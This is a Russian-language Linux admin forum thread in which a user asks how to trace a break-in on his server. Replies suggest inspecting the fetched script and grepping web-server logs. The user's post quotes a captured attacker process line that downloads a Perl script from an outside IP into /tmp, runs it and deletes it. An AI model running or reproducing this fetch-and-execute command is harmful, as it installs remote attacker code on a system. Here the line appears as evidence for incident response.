LINUX.ORG.RU
ФорумAdmin

Атака


0

0

Всем привет!

Помогите разобраться. Кто-то вломился в систему.
Как выяснить, кто пытается запустить данный процесс? 
19715 www sh -c cd /tmp;wget http://84.244.2.24/mambus.txt;perl mambus.txt;rm -rf mambus.txt

Всем спасибо за помощь.
Владимир
anonymous

Ответ на: комментарий от Lumi

PS: ничего не скажет, если уже отключились. Лучше скачать http://84.244.2.24/mambus.txt и посмотреть чего же именно наколбасили в системе.

Lumi ★★★★★
()
Ответ на: комментарий от anonymous

Лучше ищи почему и как тебя поимели. В следующий раз подправят скриптик и будет им счастье. А так -- детишки какие-то побаловались безобидно.

Lumi ★★★★★
()
Ответ на: комментарий от anonymous

Может grep`нуть логи web-сервера на предмет 'mambus'?

kmeaw ★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.